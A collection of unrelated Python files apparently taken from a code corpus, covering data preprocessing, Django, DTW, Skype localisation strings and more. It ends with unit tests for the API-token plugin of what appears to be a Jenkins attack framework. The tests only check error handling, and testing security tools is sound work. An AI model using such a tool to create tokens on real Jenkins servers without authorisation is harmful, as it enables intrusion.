except OSError:
return ''
assert ll_to_string(interpret(f, [0])) == f(0)
assert ll_to_string(interpret(f, [338])) == ''
|
56722
|
class Solution:
def minStartValue(self, nums: List[int]) -> int:
total = minSum = 0
for num in nums:
total += num
minSum = min(minSum, total)
return 1 - minSum
|
56738
|
import os
import random
import shutil
# We need to change the dataset so that it is split into train/validation/test
# portions, and labelled with a single attribute (e.g. 'color').
attributes = ('color', 'number', 'shape', 'shading', 'all')
attribute_label_extraction_fns = {
'number': lambda dir: dir.split('-')[0],
'color': lambda dir: dir.split('-')[1],
'shading': lambda dir: dir.split('-')[2],
'shape': lambda dir: dir.split('-')[3].rstrip('s'), # remove trailing 's'
'all': lambda dir: dir
}
def copyfile(src_dir, dest_dir, file):
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
shutil.copyfile(os.path.join(src_dir, file), os.path.join(dest_dir, file))
def create_split_datasets(dataset_dir, target_dir, label_extract_fn,
train_split_percent, validation_split_percent, test_split_percentage):
dirs = []
for (dirpath, dirnames, filenames) in os.walk(dataset_dir):
dirs.extend(dirnames)
break
target_train_dir = os.path.join(target_dir, 'train')
target_validation_dir = os.path.join(target_dir, 'validation')
target_test_dir = os.path.join(target_dir, 'test')
for dir in dirs:
subdir = os.path.join(dataset_dir, dir)
files = os.listdir(subdir)
random.shuffle(files)
i1 = int(len(files) * train_split_percent / 100)
i2 = int(len(files) * (train_split_percent + validation_split_percent) / 100)
train, validation, test = files[:i1], files[i1:i2], files[i2:]
label = label_extract_fn(dir)
for file in train:
copyfile(subdir, os.path.join(target_train_dir, label), file)
for file in validation:
copyfile(subdir, os.path.join(target_validation_dir, label), file)
for file in test:
copyfile(subdir, os.path.join(target_test_dir, label), file)
def create_single_attribute_test_dataset(dataset_dir, target_dir, label_extract_fn):
dirs = []
for (dirpath, dirnames, filenames) in os.walk(dataset_dir):
dirs.extend(dirnames)
break
for dir in dirs:
files = os.listdir(os.path.join(dataset_dir, dir))
label = label_extract_fn(dir)
for file in files:
copyfile(os.path.join(dataset_dir, dir), os.path.join(target_dir, label),
file)
for attribute in attributes:
create_split_datasets('data/train-v2/labelled', f'data/{attribute}',
attribute_label_extraction_fns[attribute],
70, 20, 10)
create_single_attribute_test_dataset('data/test-v2', f'data/{attribute}-test',
attribute_label_extraction_fns[attribute])
# Create an artificially small training dataset to observe overfitting
create_split_datasets('data/train-v2/labelled', f'data/shape-small',
attribute_label_extraction_fns['shape'],
1, 20, 79)
|
56787
|
import logging
import os
from django.conf import settings
from django.core.management.base import BaseCommand
from core.management.commands import configure_logging
from core.models import Batch, OcrDump
configure_logging("dump_ocr_logging.config", "dump_ocr.log")
_logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = "looks for batches that need to have ocr dump files created"
def handle(self, *args, **options):
if not os.path.isdir(settings.OCR_DUMP_STORAGE):
os.makedirs(settings.OCR_DUMP_STORAGE)
for batch in Batch.objects.filter(ocr_dump__isnull=True):
_logger.info("starting to dump ocr for %s", batch)
try:
if batch.ocr_dump:
_logger.info("Ocr is already generated for %s", batch)
continue
except OcrDump.DoesNotExist:
pass
dump = OcrDump.new_from_batch(batch)
_logger.info("created ocr dump %s for %s", dump, batch)
|
56788
|
import os
import codecs
from setuptools import setup, find_packages
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
def read(*path):
full_path = os.path.join(PROJECT_ROOT, *path)
with codecs.open(full_path, 'r', encoding='utf-8') as f:
return f.read()
setup(
name='django-envsettings',
version='1.1.0',
author='<NAME>',
author_email='<EMAIL>',
url='http://github.com/evansd/django-envsettings',
packages=find_packages(exclude=['tests*']),
license='MIT',
description="One-stop shop for configuring 12-factor Django apps",
long_description=read('README.rst'),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
)
|
56820
|
from definitions import SYSTEM, System, GameStatus
import os
import asyncio
import logging as log
from consts import UBISOFT_REGISTRY_LAUNCHER_INSTALLS
if SYSTEM == System.WINDOWS:
import winreg
def _get_registry_value_from_path(top_key, registry_path, key):
with winreg.OpenKey(top_key, registry_path, 0, winreg.KEY_READ) as winkey:
return winreg.QueryValueEx(winkey, key)[0]
def _return_local_game_path_from_special_registry(special_registry_path):
if not special_registry_path:
return GameStatus.NotInstalled
try:
install_location = _get_registry_value_from_path(winreg.HKEY_LOCAL_MACHINE, special_registry_path,
"InstallLocation")
return install_location
except WindowsError:
# Entry doesn't exist, game is not installed.
return ""
except Exception as e:
log.warning(f"Unable to read special registry status for {special_registry_path}: {repr(e)}")
return ""
def _return_local_game_path(launch_id):
installs_path = UBISOFT_REGISTRY_LAUNCHER_INSTALLS
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, installs_path):
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, installs_path + f'\\{launch_id}') as lkey:
game_path, _ = winreg.QueryValueEx(lkey, 'InstallDir')
return os.path.normcase(os.path.normpath(game_path))
except OSError:
return "" # end of iteration
except WindowsError:
return "" # Game not installed / during installation
def get_local_game_path(special_registry_path, launch_id):
local_game_path = _return_local_game_path(launch_id)
if not local_game_path and special_registry_path:
local_game_path = _return_local_game_path_from_special_registry(special_registry_path)
return local_game_path
async def get_size_at_path(start_path):
total_size = 0
for dirpath, dirnames, filenames in os.walk(start_path):
for f in filenames:
fp = os.path.join(dirpath, f)
if not os.path.islink(fp):
total_size += os.path.getsize(fp)
await asyncio.sleep(0)
return total_size
def _is_file_at_path(path, file):
if os.path.isdir(path):
file_location = os.path.join(path, file)
if os.path.isfile(file_location):
return True
return False
else:
return False
def _read_status_from_state_file(game_path):
try:
if os.path.exists(os.path.join(game_path, 'uplay_install.state')):
with open(os.path.join(game_path, 'uplay_install.state'), 'rb') as f:
if f.read()[0] == 0x0A:
return GameStatus.Installed
else:
return GameStatus.NotInstalled
# State file doesn't exit
else:
return GameStatus.NotInstalled
except Exception as e:
log.warning(f"Issue reading install state file for {game_path}: {repr(e)}")
return GameStatus.NotInstalled
def get_game_installed_status(path, exe=None, special_registry_path=None):
status = GameStatus.NotInstalled
try:
if path and os.access(path, os.F_OK):
status = _read_status_from_state_file(path)
# Fallback for old games
if status == GameStatus.NotInstalled and exe and special_registry_path:
if _is_file_at_path(path, exe):
status = GameStatus.Installed
except Exception as e:
log.error(f"Error reading game installed status at {path}: {repr(e)}")
finally:
return status
|
56845
|
import unittest
from test.test_utils import get_repository
from unittest.mock import Mock
from autopr.database import Database
class DatabaseTest(unittest.TestCase):
def test_needs_pulling_empty(self):
db = Database()
self.assertTrue(db.needs_pulling())
def test_needs_pulling_not_empty(self):
db = Database(user=Mock())
self.assertFalse(db.needs_pulling())
def test_reset_empty(self):
db = Database(user=Mock(), repositories=[])
db.reset()
self.assertEqual(0, len(db.repositories))
def test_reset_non_empty(self):
repo_first = get_repository("first")
repo_first.done = True
repo_second = get_repository("second")
db = Database(
user=Mock(),
repositories=[
repo_first,
repo_second,
],
)
self.assertTrue(db.repositories[0].done)
self.assertFalse(db.repositories[1].done)
db.reset()
self.assertFalse(db.repositories[0].done)
self.assertFalse(db.repositories[1].done)
def test_merge_into(self):
db_first = Database(
user=Mock(),
repositories=[
get_repository("first"),
get_repository("second"),
],
)
db_second = Database(
user=Mock(),
repositories=[
get_repository("third"),
get_repository("fourth"),
],
)
db_first.merge_into(db_second)
self.assertEqual(4, len(db_first.repositories))
self.assertEqual("first", db_first.repositories[0].name)
self.assertEqual("fourth", db_first.repositories[3].name)
def test_repositories_to_process(self):
db = Database(
user=Mock(),
repositories=[
get_repository("removed", removed=True),
get_repository("done", done=True),
get_repository("non-removed"),
],
)
repositories = db.repositories_to_process()
self.assertEqual(1, len(repositories))
self.assertEqual("non-removed", repositories[0].name)
if __name__ == "__main__":
unittest.main()
|
56859
|
import json
import jieba
import pickle
import csv, h5py
import pandas as pd
import numpy as np
from tqdm import *
import torch
from torch import Tensor
from torch.autograd import Variable
import torch.utils.data as data
from main import Hyperparameters
from collections import Counter
STOP_TAG = "#stop#"
UNK_TAG = "#unk#"
def filter(ret, min_count):
count = pd.Series(ret).value_counts()
count = count[count >= min_count]
char_set = list(count.index)
return char_set
def get_vocab(param):
ret = []
with open(param.train_json_path) as f:
for line in tqdm(f):
line = json.loads(line)
if len(line['answer_docs']) == 0 or len(line['fake_answers']) == 0:
continue
document = line['documents'][line['answer_docs'][0]]
paragraph = document['paragraphs'][document['most_related_para']]
for p in paragraph: ret.append(p)
ret = filter(ret, param.min_count)
ret = sorted(list(ret))
input_set = [STOP_TAG, UNK_TAG]
input_set.extend(list(ret))
input_set_size = len(input_set)
input2idx = dict(zip(input_set, range(input_set_size)))
print('Vacabulary size:', input_set_size, '\n')
return input2idx, input_set_size
def save_vocab(path, input2idx):
print('Saving bocabulary...')
f = open(path,'wb')
pickle.dump(input2idx, f)
f.close()
def load_vocab(path):
print('Loading vocabulary...')
f = open(path, 'rb')
input2idx = pickle.load(f)
input_set = list(input2idx.keys())
input_set_size = len(input_set)
f.close()
print('Vacabulary size:', input_set_size, '\n')
return input2idx, input_set_size
# ------------------ save h5py file --------------------------- #
def load_evidence_and_feats(evidence, feats, input2idx):
evidence_vector = []
feats_vector = []
for e, f in zip(evidence, feats):
if e in input2idx:
evidence_vector.append(input2idx[e])
feats_vector.append(f)
return evidence_vector, feats_vector, len(evidence_vector)
def pad_sequence(seq, seq_size, word2idx):
vector = []
for i in range(seq_size):
if i >= len(seq):
vector.append(word2idx[STOP_TAG])
elif seq[i] not in word2idx:
vector.append(word2idx[UNK_TAG])
else:
vector.append(word2idx[seq[i]])
if len(seq) < seq_size:
length = len(seq)
else:
length = seq_size
return vector, length
def save_data(file, param, data, shape, i):
if i <= param.batch_storage_size:
for key, value in data.items():
if value == []: continue
file.create_dataset(key, data = value, maxshape = shape[key])
else:
old_len = len(file['question'])
new_len = old_len + len(data['question'])
for key, value in data.items():
if value == []: continue
new_shape = [new_len]
for s in shape[key][1:]:
new_shape.append(s)
file[key].resize(new_shape)
file[key][old_len: new_len] = value
print(i)
def get_train_data(param, line):
document = line['documents'][line['answer_docs'][0]]
#paragraph = document['paragraphs'][document['most_related_para']]
segmented_paragraph = document['segmented_paragraphs'][document['most_related_para']]
paragraph = ''.join(segmented_paragraph)
if len(paragraph) > param.paragraph_size:
return [], [], []
paragraph, paragraph_length = pad_sequence(paragraph, param.paragraph_size, param.word2idx)
answer_span = line['answer_spans'][0]
fake_answer = line['fake_answers'][0]
answer_start = len(''.join(segmented_paragraph[:answer_span[0]]))
answer_end = len(''.join(segmented_paragraph[:answer_span[1]+1]))
answer = [answer_start, answer_end]
return paragraph, paragraph_length, answer
def get_val_data(param, line):
paragraphs, paragraph_lengths, answers = [], [], []
documents = line['documents']
question_tokens = line['segmented_question']
for d in documents:
para_infos = []
for para_tokens in d['segmented_paragraphs']:
common_with_question = Counter(para_tokens) & Counter(question_tokens)
correct_preds = sum(common_with_question.values())
if correct_preds == 0:
recall_wrt_question = 0
else:
recall_wrt_question = float(correct_preds) / len(question_tokens)
para_infos.append((para_tokens, recall_wrt_question, len(para_tokens)))
para_infos.sort(key=lambda x: (-x[1], x[2]))
fake_paragraph = ''.join(para_infos[0][0])
if (len(fake_paragraph)) > param.paragraph_size:
continue
fake_paragraph, fake_paragraph_length = pad_sequence(fake_paragraph, param.paragraph_size, param.word2idx)
paragraphs.append(fake_paragraph)
paragraph_lengths.append(fake_paragraph_length)
answers = line['answers']
return paragraphs, paragraph_lengths, answers
def save_h5py_file(param, old_path, new_path):
print('Saving (', new_path, ')...')
file = h5py.File(new_path,'w')
data = {'question_id':[], 'question_type':[], 'question':[], 'question_length':[],
'paragraph':[], 'answer':[], 'paragraph_length':[], 'paragraphs':[], 'paragraph_lengths':[]}
shape = {'question_id':(None,), 'question_type':(None,), 'question':(None, param.question_size), 'question_length':(None,),
'paragraph':(None, param.paragraph_size), 'answer':(None, 2), 'paragraph_length':(None,),
'paragraphs':(None, None, param.paragraph_size), 'paragraph_lengths':(None, None,)}
#evaluate = {}
i = 0
with open(old_path) as f:
for line in tqdm(f):
line = json.loads(line)
documents = line['documents']
question = line['question']
question_id = line['question_id']
question_type = line['question_type']
question_tokens = line['segmented_question']
if len(question) > param.question_size:
continue
# train
if old_path == param.train_json_path:
if len(line['answer_docs']) == 0 or len(line['fake_answers']) == 0:
continue
paragraph, paragraph_length, answer = get_train_data(param, line)
if paragraph == []: continue
data['paragraph'].append(paragraph)
data['paragraph_length'].append(paragraph_length)
data['answer'].append(answer)
# val
elif old_path == param.val_json_path:
paragraphs, paragraph_lengths, answers = get_val_data(param, line)
if paragraphs == []: continue
data['paragraphs'].append(paragraphs)
data['paragraph_lengths'].append(paragraph_lengths)
#data['answers'].append(answers)
data['question_id'].append(question_id)
question, question_length = pad_sequence(question, param.question_size, param.word2idx)
data['question'].append(question)
data['question_length'].append(question_length)
# ---------------------------------
i += 1
if i % param.batch_storage_size == 0:
save_data(file, param, data, shape, i)
data = {'question_id':[], 'question_type':[], 'question':[], 'question_length':[],
'paragraph':[], 'answer':[], 'paragraph_length':[], 'paragraphs':[], 'paragraph_lengths':[]}
if i % param.batch_storage_size != 0:
save_data(file, param, data, shape, i)
file.close()
print('Dataset: ', i)
def get_answer():
with open(param.val_json_path) as f:
for line in tqdm(f):
line = json.loads(line)
question_id = line['question_id']
answers = line['answers']
if __name__ == '__main__':
param = Hyperparameters()
# 5143
#word2idx, word_set_size = get_vocab(param)
#idx2word = dict(zip(word2idx.values(), word2idx.keys()))
#print(word2idx['苏'], idx2word[520])
#save_vocab(param.vocab_path, word2idx)
param.word2idx, param.vocab_size = load_vocab(param.vocab_path)
param.idx2word = dict(zip(param.word2idx.values(), param.word2idx.keys()))
#print(word2idx['苏'], idx2word[520])
#save_h5py_file(param, param.train_json_path, param.train_h5py_path)
save_h5py_file(param, param.val_json_path, param.val_h5py_path)
|
56864
|
import librosa
from numba import jit
import numpy as np
@jit(nopython=True, cache=True)
def __C_to_DE(C: np.ndarray = None,
dn: np.ndarray = np.array([1, 1, 0], np.int64),
dm: np.ndarray = np.array([1, 0, 1], np.int64),
dw: np.ndarray = np.array([1.0, 1.0, 1.0], np.float64),
sub_sequence: bool = False) -> (np.ndarray, np.ndarray):
"""This function computes the accumulated cost matrix D and the step index
matrix E.
Parameters
----------
C : np.ndarray (np.float32 / np.float64) [shape=(N, M)]
Cost matrix
dn : np.ndarray (np.int64) [shape=(1, S)]
Integer array defining valid steps (N direction of C), default: [1, 1, 0]
dm : np.ndarray (np.int64) [shape=(1, S)]
Integer array defining valid steps (M direction of C), default: [1, 0, 1]
dw : np.ndarray (np.float64) [shape=(1, S)]
Double array defining the weight of the each step, default: [1.0, 1.0, 1.0]
sub_sequence : bool
Set `True` for SubSequence DTW, default: False
Returns
-------
D : np.ndarray (np.float64) [shape=(N, M)]
Accumulated cost matrix of type double
E : np.ndarray (np.int64) [shape=(N, M)]
Step index matrix.
E[n, m] holds the index of the step take to determine the value of D[n, m].
If E[n, m] is zero, no valid step was possible.
NaNs in the cost matrix are preserved, invalid fields in the cost matrix are NaNs.
"""
if C is None:
raise ValueError('C must be a 2D numpy array.')
N, M = C.shape
S = dn.size
if S != dm.size or S != dw.size:
raise ValueError('The parameters dn,dm, and dw must be of equal length.')
# calc bounding box size of steps
sbbn = np.max(dn)
sbbm = np.max(dm)
# initialize E
E = np.zeros((N, M), np.int64) - 1
# initialize extended D matrix
D = np.ones((sbbn + N, sbbm + M), np.float64) * np.inf
if sub_sequence:
for m in range(M):
D[sbbn, sbbm + m] = C[0, m]
else:
D[sbbn, sbbm] = C[0, 0]
# accumulate
for m in range(sbbm, M + sbbm):
for n in range(sbbn, N + sbbn):
for s in range(S):
cost = D[n - dn[s], m - dm[s]] + C[n - sbbn, m - sbbm] * dw[s]
if cost < D[n, m]:
D[n, m] = cost
E[n - sbbn, m - sbbm] = s
D = D[sbbn: N + sbbn, sbbm: M + sbbm]
return D, E
@jit(nopython=True, cache=True)
def __E_to_warping_path(E: np.ndarray,
dn: np.ndarray = np.array([1, 1, 0], np.int64),
dm: np.ndarray = np.array([1, 0, 1], np.int64),
sub_sequence: bool = False,
end_index: int = -1) -> np.ndarray:
"""This function computes a warping path based on the provided matrix E
and the allowed steps.
Parameters
----------
E : np.ndarray (np.int64) [shape=(N, M)]
Step index matrix
dn : np.ndarray (np.int64) [shape=(1, S)]
Integer array defining valid steps (N direction of C), default: [1, 1, 0]
dm : np.ndarray (np.int64) [shape=(1, S)]
Integer array defining valid steps (M direction of C), default: [1, 0, 1]
sub_sequence : bool
Set `True` for SubSequence DTW, default: False
end_index : int
In case of SubSequence DTW
Returns
-------
warping_path : np.ndarray (np.int64) [shape=(2, M)]
Resulting optimal warping path
"""
N, M = E.shape
if not sub_sequence and end_index == -1:
end_index = M - 1
m = end_index
n = N - 1
warping_path = np.zeros((2, n + m + 1))
index = 0
def _loop(m, n, index):
warping_path[:, index] = np.array([n, m])
step_index = E[n, m]
m -= dm[step_index]
n -= dn[step_index]
index += 1
return m, n, index
if sub_sequence:
while n > 0:
m, n, index = _loop(m, n, index)
else:
while m > 0 or n > 0:
m, n, index = _loop(m, n, index)
warping_path[:, index] = np.array([n, m])
warping_path = warping_path[:, index::-1]
return warping_path
def compute_warping_path(C: np.ndarray,
step_sizes: np.ndarray = np.array([[1, 0], [0, 1], [1, 1]], np.int64),
step_weights: np.ndarray = np.array([1.0, 1.0, 1.0], np.float64),
implementation: str = 'synctoolbox'):
"""Applies DTW on cost matrix C.
Parameters
----------
C : np.ndarray (np.float32 / np.float64) [shape=(N, M)]
Cost matrix
step_sizes : np.ndarray (np.int64) [shape=(2, S)]
Array of step sizes
step_weights : np.ndarray (np.float64) [shape=(2, S)]
Array of step weights
implementation: str
Choose among ``synctoolbox`` and ``librosa``. (default: ``synctoolbox``)
Returns
-------
D : np.ndarray (np.float64) [shape=(N, M)]
Accumulated cost matrix
E : np.ndarray (np.int64) [shape=(N, M)]
Step index matrix
wp : np.ndarray (np.int64) [shape=(2, M)]
Warping path
"""
if implementation == 'librosa':
D, wp, E = librosa.sequence.dtw(C=C,
step_sizes_sigma=step_sizes,
weights_add=np.array([0, 0, 0]),
weights_mul=step_weights,
return_steps=True,
subseq=False)
wp = wp[::-1].T
elif implementation == 'synctoolbox':
dn = step_sizes[:, 0]
dm = step_sizes[:, 1]
D, E = __C_to_DE(C,
dn=dn,
dm=dm,
dw=step_weights,
sub_sequence=False)
wp = __E_to_warping_path(E=E,
dn=dn,
dm=dm,
sub_sequence=False)
else:
raise NotImplementedError(f'No implementation found called {implementation}')
return D, E, wp
|
56868
|
apiAttachAvailable = u'API Kullanilabilir'
apiAttachNotAvailable = u'Kullanilamiyor'
apiAttachPendingAuthorization = u'Yetkilendirme Bekliyor'
apiAttachRefused = u'Reddedildi'
apiAttachSuccess = u'Basarili oldu'
apiAttachUnknown = u'Bilinmiyor'
budDeletedFriend = u'Arkadas Listesinden Silindi'
budFriend = u'Arkadas'
budNeverBeenFriend = u'Arkadas Listesinde Hi\xe7 Olmadi'
budPendingAuthorization = u'Yetkilendirme Bekliyor'
budUnknown = u'Bilinmiyor'
cfrBlockedByRecipient = u'\xc7agri alici tarafindan engellendi'
cfrMiscError = u'Diger Hata'
cfrNoCommonCodec = u'Genel codec yok'
cfrNoProxyFound = u'Proxy bulunamadi'
cfrNotAuthorizedByRecipient = u'Ge\xe7erli kullanici alici tarafindan yetkilendirilmemis'
cfrRecipientNotFriend = u'Alici bir arkadas degil'
cfrRemoteDeviceError = u'Uzak ses aygitinda problem var'
cfrSessionTerminated = u'Oturum sonlandirildi'
cfrSoundIOError = u'Ses G/\xc7 hatasi'
cfrSoundRecordingError = u'Ses kayit hatasi'
cfrUnknown = u'Bilinmiyor'
cfrUserDoesNotExist = u'Kullanici/telefon numarasi mevcut degil'
cfrUserIsOffline = u'\xc7evrim Disi'
chsAllCalls = u'Eski Diyalog'
chsDialog = u'Diyalog'
chsIncomingCalls = u'\xc7oklu Sohbet Kabul\xfc Gerekli'
chsLegacyDialog = u'Eski Diyalog'
chsMissedCalls = u'Diyalog'
chsMultiNeedAccept = u'\xc7oklu Sohbet Kabul\xfc Gerekli'
chsMultiSubscribed = u'\xc7oklu Abonelik'
chsOutgoingCalls = u'\xc7oklu Abonelik'
chsUnknown = u'Bilinmiyor'
chsUnsubscribed = u'Aboneligi Silindi'
clsBusy = u'Mesgul'
clsCancelled = u'Iptal Edildi'
clsEarlyMedia = u'Early Media y\xfcr\xfct\xfcl\xfcyor'
clsFailed = u'\xdczg\xfcn\xfcz, arama basarisiz!'
clsFinished = u'Bitirildi'
clsInProgress = u'Arama Yapiliyor'
clsLocalHold = u'Yerel Beklemede'
clsMissed = u'Cevapsiz Arama'
clsOnHold = u'Beklemede'
clsRefused = u'Reddedildi'
clsRemoteHold = u'Uzak Beklemede'
clsRinging = u'ariyor'
clsRouting = u'Y\xf6nlendirme'
clsTransferred = u'Bilinmiyor'
clsTransferring = u'Bilinmiyor'
clsUnknown = u'Bilinmiyor'
clsUnplaced = u'Asla baglanmadi'
clsVoicemailBufferingGreeting = u'Selamlama Ara Bellege Aliniyor'
clsVoicemailCancelled = u'Sesli Posta Iptal Edildi'
clsVoicemailFailed = u'Sesli Mesaj Basarisiz'
clsVoicemailPlayingGreeting = u'Selamlama Y\xfcr\xfct\xfcl\xfcyor'
clsVoicemailRecording = u'Sesli Mesaj Kaydediliyor'
clsVoicemailSent = u'Sesli Posta G\xf6nderildi'
clsVoicemailUploading = u'Sesli Posta Karsiya Y\xfckleniyor'
cltIncomingP2P = u'Gelen Esler Arasi Telefon \xc7agrisi'
cltIncomingPSTN = u'Gelen Telefon \xc7agrisi'
cltOutgoingP2P = u'Giden Esler Arasi Telefon \xc7agrisi'
cltOutgoingPSTN = u'Giden Telefon \xc7agrisi'
cltUnknown = u'Bilinmiyor'
cmeAddedMembers = u'Eklenen \xdcyeler'
cmeCreatedChatWith = u'Sohbet Olusturuldu:'
cmeEmoted = u'Bilinmiyor'
cmeLeft = u'Birakilan'
cmeSaid = u'Ifade'
cmeSawMembers = u'G\xf6r\xfclen \xdcyeler'
cmeSetTopic = u'Konu Belirleme'
cmeUnknown = u'Bilinmiyor'
cmsRead = u'Okundu'
cmsReceived = u'Alindi'
cmsSending = u'G\xf6nderiliyor...'
cmsSent = u'G\xf6nderildi'
cmsUnknown = u'Bilinmiyor'
conConnecting = u'Baglaniyor'
conOffline = u'\xc7evrim Disi'
conOnline = u'\xc7evrim I\xe7i'
conPausing = u'Duraklatiliyor'
conUnknown = u'Bilinmiyor'
cusAway = u'Uzakta'
cusDoNotDisturb = u'Rahatsiz Etmeyin'
cusInvisible = u'G\xf6r\xfcnmez'
cusLoggedOut = u'\xc7evrim Disi'
cusNotAvailable = u'Kullanilamiyor'
cusOffline = u'\xc7evrim Disi'
cusOnline = u'\xc7evrim I\xe7i'
cusSkypeMe = u'Skype Me'
cusUnknown = u'Bilinmiyor'
cvsBothEnabled = u'Video G\xf6nderme ve Alma'
cvsNone = u'Video Yok'
cvsReceiveEnabled = u'Video Alma'
cvsSendEnabled = u'Video G\xf6nderme'
cvsUnknown = u''
grpAllFriends = u'T\xfcm Arkadaslar'
grpAllUsers = u'T\xfcm Kullanicilar'
grpCustomGroup = u'\xd6zel'
grpOnlineFriends = u'\xc7evrimi\xe7i Arkadaslar'
grpPendingAuthorizationFriends = u'Yetkilendirme Bekliyor'
grpProposedSharedGroup = u'Proposed Shared Group'
grpRecentlyContactedUsers = u'Son Zamanlarda Iletisim Kurulmus Kullanicilar'
grpSharedGroup = u'Shared Group'
grpSkypeFriends = u'Skype Arkadaslari'
grpSkypeOutFriends = u'SkypeOut Arkadaslari'
grpUngroupedFriends = u'Gruplanmamis Arkadaslar'
grpUnknown = u'Bilinmiyor'
grpUsersAuthorizedByMe = u'Tarafimdan Yetkilendirilenler'
grpUsersBlockedByMe = u'Engellediklerim'
grpUsersWaitingMyAuthorization = u'Yetkilendirmemi Bekleyenler'
leaAddDeclined = u'Ekleme Reddedildi'
leaAddedNotAuthorized = u'Ekleyen Kisinin Yetkisi Olmali'
leaAdderNotFriend = u'Ekleyen Bir Arkadas Olmali'
leaUnknown = u'Bilinmiyor'
leaUnsubscribe = u'Aboneligi Silindi'
leaUserIncapable = u'Kullanicidan Kaynaklanan Yetersizlik'
leaUserNotFound = u'Kullanici Bulunamadi'
olsAway = u'Uzakta'
olsDoNotDisturb = u'Rahatsiz Etmeyin'
olsNotAvailable = u'Kullanilamiyor'
olsOffline = u'\xc7evrim Disi'
olsOnline = u'\xc7evrim I\xe7i'
olsSkypeMe = u'Skype Me'
olsSkypeOut = u'SkypeOut'
olsUnknown = u'Bilinmiyor'
smsMessageStatusComposing = u'Composing'
smsMessageStatusDelivered = u'Delivered'
smsMessageStatusFailed = u'Failed'
smsMessageStatusRead = u'Read'
smsMessageStatusReceived = u'Received'
smsMessageStatusSendingToServer = u'Sending to Server'
smsMessageStatusSentToServer = u'Sent to Server'
smsMessageStatusSomeTargetsFailed = u'Some Targets Failed'
smsMessageStatusUnknown = u'Unknown'
smsMessageTypeCCRequest = u'Confirmation Code Request'
smsMessageTypeCCSubmit = u'Confirmation Code Submit'
smsMessageTypeIncoming = u'Incoming'
smsMessageTypeOutgoing = u'Outgoing'
smsMessageTypeUnknown = u'Unknown'
smsTargetStatusAcceptable = u'Acceptable'
smsTargetStatusAnalyzing = u'Analyzing'
smsTargetStatusDeliveryFailed = u'Delivery Failed'
smsTargetStatusDeliveryPending = u'Delivery Pending'
smsTargetStatusDeliverySuccessful = u'Delivery Successful'
smsTargetStatusNotRoutable = u'Not Routable'
smsTargetStatusUndefined = u'Undefined'
smsTargetStatusUnknown = u'Unknown'
usexFemale = u'Kadin'
usexMale = u'Erkek'
usexUnknown = u'Bilinmiyor'
vmrConnectError = u'Baglanti Hatasi'
vmrFileReadError = u'Dosya Okuma Hatasi'
vmrFileWriteError = u'Dosya Yazma Hatasi'
vmrMiscError = u'Diger Hata'
vmrNoError = u'Hata Yok'
vmrNoPrivilege = u'Sesli Posta \xd6nceligi Yok'
vmrNoVoicemail = u'B\xf6yle Bir Sesli Posta Yok'
vmrPlaybackError = u'Y\xfcr\xfctme Hatasi'
vmrRecordingError = u'Kayit Hatasi'
vmrUnknown = u'Bilinmiyor'
vmsBlank = u'Bos'
vmsBuffering = u'Ara bellege aliniyor'
vmsDeleting = u'Siliniyor'
vmsDownloading = u'Karsidan Y\xfckleniyor'
vmsFailed = u'Basarisiz Oldu'
vmsNotDownloaded = u'Karsidan Y\xfcklenmedi'
vmsPlayed = u'Y\xfcr\xfct\xfcld\xfc'
vmsPlaying = u'Y\xfcr\xfct\xfcl\xfcyor'
vmsRecorded = u'Kaydedildi'
vmsRecording = u'Sesli Mesaj Kaydediliyor'
vmsUnknown = u'Bilinmiyor'
vmsUnplayed = u'Y\xfcr\xfct\xfclmemis'
vmsUploaded = u'Karsiya Y\xfcklendi'
vmsUploading = u'Karsiya Y\xfckleniyor'
vmtCustomGreeting = u'\xd6zel Selamlama'
vmtDefaultGreeting = u'Varsayilan Selamlama'
vmtIncoming = u'gelen sesli mesaj'
vmtOutgoing = u'Giden'
vmtUnknown = u'Bilinmiyor'
vssAvailable = u'Kullanilabilir'
vssNotAvailable = u'Kullanilamiyor'
vssPaused = u'Duraklatildi'
vssRejected = u'Reddedildi'
vssRunning = u'\xc7alisiyor'
vssStarting = u'Basliyor'
vssStopping = u'Durduruluyor'
vssUnknown = u'Bilinmiyor'
|
56910
|
import random
import string
import unittest
import warnings
from libs import jenkinslib
from libs.JAF.BaseCommandLineParser import BaseCommandLineParser
from libs.JAF.plugin_CreateAPIToken import CreateAPIToken, CreateAPITokenParser
from libs.JAF.plugin_DeleteAPIToken import DeleteAPIToken, DeleteAPITokenParser
from libs.JAF.plugin_ListAPITokens import ListAPITokens, ListAPITokensParser
from .configuration import (
server,
user_admin,
user_bad,
user_noaccess,
user_normal,
user_read_job_access,
user_read_no_job_access,
)
from .helpers import DummyWebServer, TestFramework
class CreateAPITokenTest(unittest.TestCase, TestFramework):
def setUp(self):
warnings.simplefilter("ignore", ResourceWarning)
self.testcommand = "CreateAPIToken"
self.TestParserClass = CreateAPITokenParser
self.TestClass = CreateAPIToken
def test_invalid_url(self):
"""Make sure that calling with invalid url fails gracefully"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", "https://127.0.0.1:59321/", "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_url_bad_protocol(self):
"""Make sure that calling with valid url (that isn't Jenkins or right protocol) fails gracefully"""
with DummyWebServer():
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", "https://127.0.0.1:59322/", "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_url_and_protocol(self):
"""Make sure that calling with valid url (that isn't Jenkins but right protocol) fails gracefully"""
with DummyWebServer():
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", "http://127.0.0.1:59322/", "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_invalid_creds(self):
"""Make sure that calling with valid jenkins (but bad creds) fails gracefully"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_anonymous_creds(self):
"""Make sure that calling with valid jenkins (but no creds)"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server],
